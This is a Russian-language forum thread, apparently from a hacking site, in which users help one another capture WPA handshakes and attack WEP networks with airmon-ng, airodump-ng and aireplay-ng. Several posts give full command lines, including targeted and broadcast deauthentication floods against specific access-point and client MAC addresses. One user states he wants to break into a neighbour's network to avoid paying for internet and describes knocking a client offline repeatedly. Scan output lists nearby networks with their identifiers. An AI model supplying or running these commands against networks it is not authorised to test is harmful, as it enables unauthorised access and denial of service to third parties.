Проблемы с перехватом хендшейка

Discussion in 'Песочница' started by Василий-Шишкин, 11 May 2015.

  1. 0x777

    0x777 New Member

    Joined:
    9 May 2015
    Messages:
    27
    Likes Received:
    3
    Reputations:
    5
    быстрее всего твоя проблемма в мощьности сигнал, смотри чтобы сигнал точки был не выше -65 дб - это раз
    второе, я там видел на одном окне у тебя надпись fixed channel -1, э использует "свою" уязивимость ВПС
    третье, ривер это ревир а все остальное это отдельно, ривер работает с конкретной уязивимостью ВПС и может перебором ламать пин роутера если этот конкретный роутер имеет эту уязвимость и не лимитирует попытки подключений что уже редкость
    четвертое, ты не видиш мак адреса бссид но зато видиш клиетов, а также видиш ш ессид (тоисть имя) базовой станции, вобше бывает на оборот, видно базу а не видно клиента и непонятно что подать аиреплаю на отправку чтоб разорвать соединение и запросить его повторнно с высылкой хендшейко который и нужно пофмать
    пятое, крякать нужно уже пойманый хеншейк который записался в кап файл.

    если не поможет напишу статью с подробным разяснением )
     
  2. Russian_MafiA

    Russian_MafiA Member

    Joined:
    10 May 2015
    Messages:
    47
    Likes Received:
    10
    Reputations:
    0
    Мля , чувак . Ты не указываешь на конкретную тд. Синтаксис для перехвата хендшейка прост , но важно чтобы кто-то из пользователей был подключен , иначе чей хэндшейк перехватывать ?
    Итак синтаксис
    airmon-ng wlan0 - переводит ваш адаптер в режим мониторинга.
    airodump-ng mon0 - сканируете в надежде найти тд.
    airodump-ng -w(имя файла хэндш.) --bssid(мак тд) - c(канал тд) mon0 - конкретизируем точку доступа и начинаем собирать пакеты!!!


    П.С . а вообще , учите английский и учитесь пользоваться гуглом и яндексом , там этого добра навалом . На первых ссылках наипонятнейшим языком все разъясняют.(тд - точка доступа)
     
  3. EgorKoval

    EgorKoval Member

    Joined:
    29 Jul 2018
    Messages:
    38
    Likes Received:
    6
    Reputations:
    0
    С помощью airodump-ng отловил сетку с WEP , но к сожалению название скрыто, кто-то может посоветовать, как можно "поработать" с этой сетью?
    Сейчас сижу на мобильном интернете, а здесь это капец как не дёшево.
    Заранее спасибо за советы!

    P.S. И подскажите, почему у неё PWR стоит в -1 ?

    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    A0:21:B7:D3:DE:D9 -1 0 0 0 -1 -1 <length: 0>
    00:8E:F2:AB:EF:0C -1 0 55 0 10 -1 WPA <length: 0>
    58:23:8C:03:88:4C -39 712 0 0 1 54e WPA2 CCMP PSK THOM_ONO4321
    DC:53:7C:30:3B:D1 -42 1310 0 0 6 54e WPA2 CCMP PSK ONO8DED
    90:67:1C:19:30:3C -49 967 63 0 4 54e WPA2 CCMP PSK vodafone3034
    E0:41:36:BD:C2:8A -52 1176 275 0 10 54e WPA2 CCMP PSK MOVISTAR_C289
    10:62:D0:19:6C:EB -57 1235 19 0 11 54e WPA2 CCMP PSK Lowi6CE6
    D8:FB:5E:9D:86:27 -62 879 7 0 1 54e WPA2 CCMP PSK MOVISTAR_8626
    D8:B6:B7:2E:85:2E -61 1108 0 0 11 54e WPA2 CCMP PSK JAZZTEL_852E
    80:29:94:B1:DC:92 -53 1156 170 0 11 54e WPA2 CCMP PSK ONO6461

    90:67:1C:19:7F:F4 -84 71 7 0 1 54e WPA2 CCMP PSK vodafone7FEE
    00:26:4D:49:68:6C -1 0 1 0 2 -1 WEP WEP <length: 0>
    70:5A:9E:27:5C:BD -85 26 0 0 1 54e WPA2 CCMP PSK vodafone5CB8
    3A:F7:3D:08:68:6E -90 49 0 0 1 54e WPA2 CCMP PSK <length: 21>
     
  4. ansell

    ansell New Member

    Joined:
    26 Aug 2015
    Messages:
    6
    Likes Received:
    3
    Reputations:
    0
    Нечего не понял если честно из вопроса.
     
  5. EgorKoval

    EgorKoval Member

    Joined:
    29 Jul 2018
    Messages:
    38
    Likes Received:
    6
    Reputations:
    0
    Я правильно понял: название сетки скрыто,поэтому PWR -1?
     
  6. EgorKoval

    EgorKoval Member

    Joined:
    29 Jul 2018
    Messages:
    38
    Likes Received:
    6
    Reputations:
    0
    Когда я спрашивал, можно ли ,как-то поработать с сеткой WEP, я имел ввиду,можно ли при таком уровне мощности, как -85 пытаться деаутентифицировать точку или это дохлый номер? Клиентов у неё я в явном виде не наблюдаю, поэтому и спрашиваю, можно ли как-то "ломануть" эту ТД?

    P.S. AWUS036AC

    90:67:1C:19:7F:F4 -84 71 7 0 1 54e WPA2 CCMP PSK vodafone7FEE
    00:26:4D:49:68:6C -1 0 1 0 2 -1 WEP WEP <length: 0>
    70:5A:9E:27:5C:BD -85 26 0 0 1 54e WPA2 CCMP PSK vodafone5CB8
     
  7. hydra

    hydra Elder - Старейшина

    Joined:
    24 Jul 2015
    Messages:
    3,361
    Likes Received:
    36,728
    Reputations:
    71
    PWR -1 Это мёртвый сигнал.Настолько мёртвый,что даже beacon пакеты не долетают до антенны. Чаще всего,именно поэтому точка "скрыта".
     
    EgorKoval likes this.
  8. hydra

    hydra Elder - Старейшина

    Joined:
    24 Jul 2015
    Messages:
    3,361
    Likes Received:
    36,728
    Reputations:
    71
    При атаке на точку с WEP, деаутентификация не требуется.Там принцип атаки другой.Основная задача,заключается в сборе необходимого объёма данных (пакетов), и расшифровки ключа.

    С таким сигналом,вряд ли получится.А если и получится,юзать точно не выйдет.
    Считается,что клиент не нужен.Но в моих случаях,именно наличие клиента,позволяло получить ключ.Причём для более быстрого сбора данных,нужен активный траффик между точкой и клиентом.
    Есть команда,которая должна заставлять точку,активно генерировать пакеты.Вот этот трюк и не работал.
     
    #48 hydra, 30 Jul 2018
    Last edited: 31 Jul 2018
  9. EgorKoval

    EgorKoval Member

    Joined:
    29 Jul 2018
    Messages:
    38
    Likes Received:
    6
    Reputations:
    0
    Спасибо за пояснения,стало ясно что с WEP номер дохлый,будем пытаться ловить хэндшейки с WPA.
     
  10. EgorKoval

    EgorKoval Member

    Joined:
    29 Jul 2018
    Messages:
    38
    Likes Received:
    6
    Reputations:
    0
    Парни посмотрите пожалуйста wpacrack.zip или есть там рукопожатие, сам я профан пока в этом((
     

    Attached Files:

  11. EgorKoval

    EgorKoval Member

    Joined:
    29 Jul 2018
    Messages:
    38
    Likes Received:
    6
    Reputations:
    0
    Вот ещё взял только что,вроде всё делал правильно,гляньте валидно ли содержимое
    Заранее всем грасиас!
     

    Attached Files:

  12. EgorKoval

    EgorKoval Member

    Joined:
    29 Jul 2018
    Messages:
    38
    Likes Received:
    6
    Reputations:
    0
    Спасибо и если не трудно, могли бы Вы пояснить, как дальше действовать, там что то чистить или конвертить?
    К сожалению плаваю пока в этой теме.
     
  13. hydra

    hydra Elder - Старейшина

    Joined:
    24 Jul 2015
    Messages:
    3,361
    Likes Received:
    36,728
    Reputations:
    71
    https://antichat.com/threads/435763/
    В самом низу поста.
     
  14. EgorKoval

    EgorKoval Member

    Joined:
    29 Jul 2018
    Messages:
    38
    Likes Received:
    6
    Reputations:
    0
    Спасибо. Буду пробовать привести в "порядок" согласно инструкции!
     
  15. EgorKoval

    EgorKoval Member

    Joined:
    29 Jul 2018
    Messages:
    38
    Likes Received:
    6
    Reputations:
    0
    Вродебы привёл в порядок, взгляните пожалуйста на скрин,или годный сар-файл для дальнейшей работы с ним?
     

    Attached Files:

  16. EgorKoval

    EgorKoval Member

    Joined:
    29 Jul 2018
    Messages:
    38
    Likes Received:
    6
    Reputations:
    0
    Спасибо!
     
  17. EgorKoval

    EgorKoval Member

    Joined:
    29 Jul 2018
    Messages:
    38
    Likes Received:
    6
    Reputations:
    0
    fixed chanel wlan1: -1 , иногда в окне терминала выскакивает это оповещение, не смотря на то что ты задал совсем иной канал?
    Помогает только перезагрузка.
    Что это за фокус?

    команда была следующая:
    airodump-ng wlan1 --bssid E0:41:36:BD:C2:8A --channel 10 --write handshake
     
  18. EgorKoval

    EgorKoval Member

    Joined:
    29 Jul 2018
    Messages:
    38
    Likes Received:
    6
    Reputations:
    0
    Кто с таким сталкивался в своей практике,поделитесь инфой:
    Всё делаю,как обычно,убиваю всё лишнее,перевожу железку в режим монитора,нахожу искомую ТД,далее:

    airodump-ng wlan1 --bssid 8C:04:FF:BE:02:AE --channel 1 --write handshake --wps --ignore-negative-one,

    затем направленное deauth сообщение:

    sudo aireplay-ng --deauth 13 -a 8C:04:FF:BE:02:AE -c BC:03:08:AF:51:2A wlan1 --ignore-negative-one,

    клиент отваливается,подключается,нет рукопожатия.
    Пробуем Отправить широковещательное deauth сообщение:

    sudo aireplay-ng wlan1 --deauth 13 -a 8C:04:FF:BE:02:AE --ignore-negative-one,

    мощность на ТД падает до нуля,нет рукопожатия,ок.
    Заё-ем клиента до нервного срыва:

    sudo aireplay-ng --deauth 100 -a 8C:04:FF:BE:02:AE -c BC:03:08:AF:51:2A wlan1 --ignore-negative-one,

    клиент пропадает из мониторинга (перегружает телефон),и так было дважды.
    Вобщем довели друг друга до нервного срыва,а результат тотже,нет рукопожатия.
    Как так может быть?
     
  19. aka_google

    aka_google Well-Known Member

    Joined:
    8 Jan 2010
    Messages:
    296
    Likes Received:
    1,851
    Reputations:
    2
    скрин дай airodump-ng -c 13 --bssid 8C:04:FF:BE:02:AE wlan1
     
  20. EgorKoval

    EgorKoval Member

    Joined:
    29 Jul 2018
    Messages:
    38
    Likes Received:
    6
    Reputations:
    0
    Ок, не догадался сразу сделать скрин